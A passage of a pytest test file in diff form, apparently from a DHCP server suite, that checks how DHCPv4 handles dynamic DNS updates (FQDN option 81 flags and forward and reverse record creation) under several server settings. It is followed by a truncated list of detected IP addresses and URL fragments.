test_ddns4_notsig_forw_and_rev_add_success_withoutflag_override_client(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('override-client-update', True) + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 3) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_success_withoutflag(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 0) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_withoutflag_notenabled(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('enable-updates', False) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + # Response option 81 MUST contain flags 0. #later make it 's' 'n' and 'o' should be 10 + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + +@pytest.mark.v4 +@pytest.mark.ddns +@pytest.mark.notsig +@pytest.mark.reverse_add +def test_ddns4_notsig_rev_Nflag_override_no_update(): + + misc.test_setup() + srv_control.config_srv_subnet('192.168.50.0/24', '127.0.0.1-127.0.0.1') + srv_control.add_ddns_server('127.0.0.1', '53001') + srv_control.add_ddns_server_options('override-no-update', True) + srv_control.add_ddns_server_options('enable-updates', True) + srv_control.add_ddns_server_options('generated-prefix', 'four') + srv_control.add_ddns_server_options('qualifying-suffix', 'example.com') + srv_control.add_forward_ddns('four.example.com.', 'EMPTY_KEY') + srv_control.add_reverse_ddns('50.168.192.in-addr.arpa.', 'EMPTY_KEY') + srv_control.build_and_send_config_files() + srv_control.start_srv('DHCP', 'started') + + srv_control.use_dns_set_number(20) + srv_control.start_srv('DNS', 'started') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER', expect_include=False) + + misc.test_procedure() + srv_msg.client_requests_option(1) + srv_msg.client_send_msg('DISCOVER') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'OFFER') + srv_msg.response_check_include_option(1) + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + + misc.test_procedure() + srv_msg.client_copy_option('server_id') + srv_msg.client_does_include_with_value('requested_addr', '127.0.0.1') + srv_msg.client_requests_option(1) + srv_msg.client_sets_value('Client', 'FQDN_flags', 'N') + srv_msg.client_sets_value('Client', 'FQDN_domain_name', 'aa.four.example.com.') + srv_msg.client_does_include('Client', 'fqdn') + srv_msg.client_send_msg('REQUEST') + + misc.pass_criteria() + srv_msg.send_wait_for_message('MUST', 'ACK') + srv_msg.response_check_content('yiaddr', '127.0.0.1') + srv_msg.response_check_include_option(1) + srv_msg.response_check_option_content(1, 'value', '127.0.0.1') + srv_msg.response_check_include_option(81) + srv_msg.response_check_option_content(81, 'flags', 3) + srv_msg.response_check_option_content(81, 'fqdn', 'aa.four.example.com.') + + misc.test_procedure() + srv_msg.dns_question_record('127.0.0.1.in-addr.arpa.', 'PTR', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', 'aa.four.example.com.') + srv_msg.dns_option_content('ANSWER', 'rrname', '127.0.0.1.in-addr.arpa.') + + misc.test_procedure() + srv_msg.dns_question_record('aa.four.example.com.', 'A', 'IN') + srv_msg.client_send_dns_query() + + misc.pass_criteria() + srv_msg.send_wait_for_query('MUST') + srv_msg.dns_option('ANSWER') + srv_msg.dns_option_content('ANSWER', 'rdata', '127.0.0.1') + srv_msg.dns_option_content('ANSWER', 'rrname', 'aa.four.example.com.') +",40763,"[['DATE_TIME', 'test_ddns4_notsig_forw_and_rev_notenabled_Sflag'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.50.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.exae.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.exae.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.cl'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'aa.four.example.com'], ['URL', 'aa.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'aa.four.example.com'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client1.four.example.com'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'client2.four.example.com'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'pytest.ma'], ['URL', 'pytest.ma'], ['URL', 'pytest.mark.no'], ['URL', 'pytest.mark.fo'], ['URL', 'control.co'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'control.ad'], ['URL', 'example.com'], ['URL', 'control.ad'], ['URL', 'four.example.com'], ['URL', 'control.ad'], ['URL', '50.168.192.in-addr.ar'], ['URL', 'control.st'], ['URL', 'control.us'], ['URL', 'control.st'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'client2.four.example.com'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', '127.0.0.1.in-addr.ar'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'misc.pa'], ['URL', 'msg.se'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.re'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'client1.four.example.com'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 'msg.cl'], ['URL', 